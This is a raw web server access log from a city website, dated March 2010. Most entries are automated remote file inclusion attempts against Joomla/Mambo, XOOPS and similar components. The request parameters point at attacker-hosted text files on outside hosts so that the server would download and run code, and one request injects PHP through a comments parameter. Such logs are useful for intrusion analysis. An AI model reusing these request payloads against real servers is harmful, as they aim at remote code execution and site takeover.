121.101.214.54 - - [01/Mar/2010:10:07:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:10:07:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:08:29 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:08:29 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:08:29 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:08:35 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:08:35 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:08:37 -0800] "GET /logs/access_081231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:10 -0800] "GET /logs/access_090301.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:11 -0800] "GET /logs/access_090701.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:13 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:13 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:13 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:18 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:19 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:19 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:19 -0800] "GET /logs/access_081231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:21 -0800] "GET /logs/access_081231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:09:30 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:47 -0800] "GET /logs/access_090301.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:47 -0800] "GET /logs/access_090701.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:53 -0800] "GET /logs/access_090301.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:09:53 -0800] "GET /logs/access_090701.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:10:01 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:04 -0800] "GET /logs/access_081230.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:04 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:04 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:12 -0800] "GET /logs/access_100101.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:11:16 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:19 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:20 -0800] "GET /logs/access_100101.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:20 -0800] "GET /logs/access_081230.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:20 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:28 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:28 -0800] "GET /logs/access_081230.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:28 -0800] "GET /logs/access_100101.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:11:28 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:11:33 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
87.106.132.3 - - [01/Mar/2010:10:11:46 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:11:48 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:11:49 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:10:15:53 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:10:15:53 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:10:15:53 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
58.150.99.144 - - [01/Mar/2010:10:16:04 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.109.127.201 - - [01/Mar/2010:10:16:24 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.109.127.201 - - [01/Mar/2010:10:16:24 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.109.127.201 - - [01/Mar/2010:10:16:27 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
222.109.127.201 - - [01/Mar/2010:10:16:28 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.wtsmith.co.uk/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:18:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:18:42 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:20:32 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:20:32 -0800] "GET /logs/access_091231.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:20:32 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:20:52 -0800] "GET /logs/access_090701.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:21:53 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:21:53 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:21:57 -0800] "GET /logs/access_090401.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
91.201.64.51 - - [01/Mar/2010:10:26:37 -0800] "GET / HTTP/1.0" 200 901 "http://cityofarkadelphia.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "cityofarkadelphia.com"
77.88.25.27 - - [01/Mar/2010:10:29:38 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:34:54 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:34:57 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:35:06 -0800] "GET /logs/access_090901.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.51 - - [01/Mar/2010:10:35:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
207.46.199.51 - - [01/Mar/2010:10:40:13 -0800] "GET /logs/scripts.log HTTP/1.1" 200 273787 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:44:29 -0800] "GET /logs/access_081101.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:44:29 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:44:29 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:46:51 -0800] "GET /logs/access_081101.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:46:52 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:46:52 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.240.113.151 - - [01/Mar/2010:10:48:20 -0800] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "cityofarkadelphia.com"
77.240.113.151 - - [01/Mar/2010:10:48:20 -0800] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:10:50:35 -0800] "GET /logs/access_090101.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:51:03 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:51:03 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:51:03 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
77.92.143.92 - - [01/Mar/2010:10:51:13 -0800] "GET /logs/access_090601.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:07 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:08 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:08 -0800] "GET /logs/access_090601.log/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:08 -0800] "GET /logs/access_090301.log/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:30 -0800] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:31 -0800] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:31 -0800] "GET /logs/access_090601.log/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:10:52:32 -0800] "GET /logs/access_090301.log/admincp/auth/checklogin.php?cfgProgDir=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:51 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:51 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:51 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:51 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:51 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:53:55 -0800] "GET /logs/access_090701.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:54:05 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:10:56:54 -0800] "GET /logs/access_090101.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:09 -0800] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:09 -0800] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:09 -0800] "GET /logs/access_091231.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:13 -0800] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
200.78.235.181 - - [01/Mar/2010:10:58:13 -0800] "GET /logs/access_081230.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
